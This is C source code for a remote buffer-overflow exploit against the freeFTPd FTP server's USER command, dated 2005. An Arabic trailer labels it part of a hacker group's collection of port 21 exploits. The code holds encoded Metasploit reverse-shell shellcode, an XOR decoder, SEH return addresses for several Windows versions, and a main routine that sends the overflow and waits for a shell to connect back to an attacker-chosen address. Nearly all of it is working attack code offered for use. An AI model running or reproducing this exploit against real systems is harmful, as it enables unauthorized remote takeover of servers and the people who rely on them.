#define BUGSTR "USER %s \r\nPASS x0ned\r\n" // Command where bug reside
#define BUFFSIZE 2000 // Buffer size
int banner();
int usage(char *filename);
int inject(char *port, char *ip);
int remote_connect( char* ip, unsigned short port );
/* win32_reverse - EXITFUNC=seh LHOST=0.0.0.0 LPORT=0 Size=312 Encoder=Pex http://metasploit.com */
char shellcode[] =
"\x2b\xc9\x83\xe9\xb8\xe8\xff\xff\xff\xff\xc0\x5e\x 81\x76\x0e\xcf"
"\xfd\x4a\x2d\x83\xee\xfc\xe2\xf4\x33\x97\xa1\x60\x 27\x04\xb5\xd2"
"\x30\x9d\xc1\x41\xeb\xd9\xc1\x68\xf3\x76\x36\x28\x b7\xfc\xa5\xa6"
"\x80\xe5\xc1\x72\xef\xfc\xa1\x64\x44\xc9\xc1\x2c\x 21\xcc\x8a\xb4"
"\x63\x79\x8a\x59\xc8\x3c\x80\x20\xce\x3f\xa1\xd9\x f4\xa9\x6e\x05"
"\xba\x18\xc1\x72\xeb\xfc\xa1\x4b\x44\xf1\x01\xa6\x 90\xe1\x4b\xc6"
"\xcc\xd1\xc1\xa4\xa3\xd9\x56\x4c\x0c\xcc\x91\x49\x 44\xbe\x7a\xa6"
"\x8f\xf1\xc1\x5d\xd3\x50\xc1\x6d\xc7\xa3\x22\xa3\x 81\xf3\xa6\x7d"
"\x30\x2b\x2c\x7e\xa9\x95\x79\x1f\xa7\x8a\x39\x1f\x 90\xa9\xb5\xfd"
"\xa7\x36\xa7\xd1\xf4\xad\xb5\xfb\x90\x74\xaf\x4b\x 4e\x10\x42\x2f"
"\x9a\x97\x48\xd2\x1f\x95\x93\x24\x3a\x50\x1d\xd2\x 19\xae\x19\x7e"
"\x9c\xbe\x19\x6e\x9c\x02\x9a\x45"
"\x00\x00\x00\x00" // IP
"\xa9\x95"
"\x00\x00" // PORT
"\xa9\xae\xc3\xcc\x5a\x95\xa6\xd4\x65\x9d\x1d\xd2\x 19\x97\x5a\x7c"
"\x9a\x02\x9a\x4b\xa5\x99\x2c\x45\xac\x90\x20\x7d\x 96\xd4\x86\xa4"
"\x28\x97\x0e\xa4\x2d\xcc\x8a\xde\x65\x68\xc3\xd0\x 31\xbf\x67\xd3"
"\x8d\xd1\xc7\x57\xf7\x56\xe1\x86\xa7\x8f\xb4\x9e\x d9\x02\x3f\x05"
"\x30\x2b\x11\x7a\x9d\xac\x1b\x7c\xa5\xfc\x1b\x7c\x 9a\xac\xb5\xfd"
"\xa7\x50\x93\x28\x01\xae\xb5\xfb\xa5\x02\xb5\x1a\x 30\x2d\x22\xca"
"\xb6\x3b\x33\xd2\xba\xf9\xb5\xfb\x30\x8a\xb6\xd2\x 1f\x95\xba\xa7"
"\xcb\xa2\x19\xd2\x19\x02\x9a\x2d";
char jmpback[]=
//22 byte xor decoder (0x55)
"\xEB\x0F\x5B\x33\xC9\x66\x83\xE9\xE0\x80\x33\x55\x 43\xE2\xFA\xEB\x05\xE8\xEC\xFF\xFF\xFF"
//(20 byte jump-back code -> springt 256 + 256 + 64 bytes terug)
"\x8C\xBB\x8C\x21\x71\xA1\x0C\xD5\x94\x5F\xC5\xAB\x 98\xAB\x98\xD5\xBC\x15\xAA\xB4";
char jmpover[]=
// 2 bytes jump 4 bytes over - 2 bytes NOP
"\xEb\x04\x90\x90";
struct retcodes{char *platform;unsigned long addr;} targets[]= {
{ "Windows NT SP 5/6" , 0x776a1082 }, // ws2help.dll pop esi, pop ebx, retn [Tnx to metasploit]
{ "Windows 2k Universal", 0x750211a9 }, // ws2help.dll pop ebp, pop ebx, retn [Tnx to metasploit]
{ "Windows XP SP 1/2" , 0x71aa13d6 }, // ws2help.dll pop ebx, pop ebp, retn [Tnx to metasploit]
{ NULL }
};
int banner() {
printf("\n _______ ________ .__ _____ __ \n");
printf("___ __\\ _ \\ ____ \\_____ \\ | |__ / | | ____ | | __ \n");
printf("\\ \\/ / /_\\ \\ / \\ _(__ < ______ | | \\ / | |__/ ___\\| |/ / \n");
printf(" > <\\ \\_/ \\ | \\/ \\ /_____/ | Y \\/ ^ /\\ \\___| < \n");
printf("/__/\\_ \\\\_____ /___| /______ / |___| /\\____ | \\___ >__|_ \\ \n");
printf(" \\/ \\/ \\/ \\/ \\/ |__| \\/ \\/ \n\n");
printf("[i] Title: \tFreeFTPD Remote USER Buffer overflow\n");
printf("[i] Discovered by:\tbarabas [mutsonline]\n");
printf("[i] Exploit by: \tExpanders\n\n");
return 0;
}
int usage(char *filename) {
int i;
printf("Usage: \t%s <host> <port> <l_ip> <l_port> <targ>\n\n",filename);
printf(" \t<host> : Victim's host\n");
printf(" \t<port> : Victim's port :: Default: 21\n");
printf(" \t<l_ip> : Local ip address for connectback\n");
printf(" \t<l_port> : Local port for connectback\n");
printf(" \t<targ> : Target from the list below\n\n");
printf("# \t Platform\n");
printf("-----------------------------------------------\n");
for(i = 0; targets[i].platform; i++)
printf("%d \t %s\n",i,targets[i].platform);
printf("-----------------------------------------------\n");
exit(0);
}
int inject(char *port, char *ip)
{
unsigned long xorip;
unsigned short xorport;
xorip = inet_addr(ip)^(unsigned long)0x2D4AFDCF;
xorport = htons(atoi( port ))^(unsigned short)0x2D4A;
memcpy ( &shellcode[184], &xorip, 4);
memcpy ( &shellcode[190], &xorport, 2);
return 0;
}
int remote_connect( char* ip, unsigned short port )
{
int s;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
{
printf ( "[X] Cannot resolve \"%s\"\n", ip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( port );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "[X] Socket failed!\n" );
exit ( 1 );
}
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "[X] Failed connecting!\n" );
exit ( 1 );
}
return ( s );
}
int main(int argc, char *argv[]) {
int s,position;
unsigned int rcv;
char *buffer,*request;
char recvbuf[256];
banner();
if( (argc != 6) || (atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534) )
usage(argv[0]);
position = 0;
printf("[+] Creating evil buffer\n");
buffer = (char *) malloc(BUFFSIZE);
request = (char *) malloc(BUFFSIZE + strlen(BUGSTR)); // +3 == \r + \n + 0x00
memset(buffer,0x90,BUFFSIZE); // Fill with nops
inject(argv[4],argv[3]); // Xor port and ip and put them into the shellcode
position = 1007 - (strlen(shellcode) + 100); // 1007 : Pointer to next Execption structure 100: divide spaces
memcpy(buffer+position,shellcode,strlen(shellcode) );
position += strlen(shellcode)+100;
position += 2; // 2 bytes more nops
memcpy(buffer+position,jmpover,2);
position += 2;
memcpy(buffer+position,&targets[atoi(argv[5])].addr,4);
position += 4;
position += 8; // 8 bytes more nops
memcpy(buffer+position,jmpback,strlen(jmpback));
position += strlen(jmpback);
position += 8; // 8 bytes more nops
memset(buffer+position,0x00,1); // End
sprintf(request,BUGSTR,buffer);
printf("[+] Connecting to remote host\n");
s = remote_connect(argv[1],atoi(argv[2]));
rcv=recv(s,recvbuf,256,0);
if(rcv<0)
{
printf("\n[X] Error while recieving banner!\n");
close_exit();
}
if (strstr(recvbuf,"freeFTPd")!=0)
{
sleep(1);
printf("[+] Sending %d bytes of painfull buffer\n",strlen(buffer));
if ( send ( s, request, strlen (request), 0) <= 0 )
{
printf("[X] Failed to send buffer\n");
exit ( 1 );
}
printf("[+] Done - Wait for shell on port %s\n",argv[4]);
} else
printf("[X] This server is not running freeFTPd\n");
close(s);
free(buffer);
buffer = NULL;
return 0;
}
// [2005-11-17]
########################################
هذاي 72 ثغرة للبورت 21 FTP
الان طرحنا بورت 21 و متبقي 113 بورت من 114
ارجو حفظ الحقوق للجيوش الهكر
تحياتي
########################################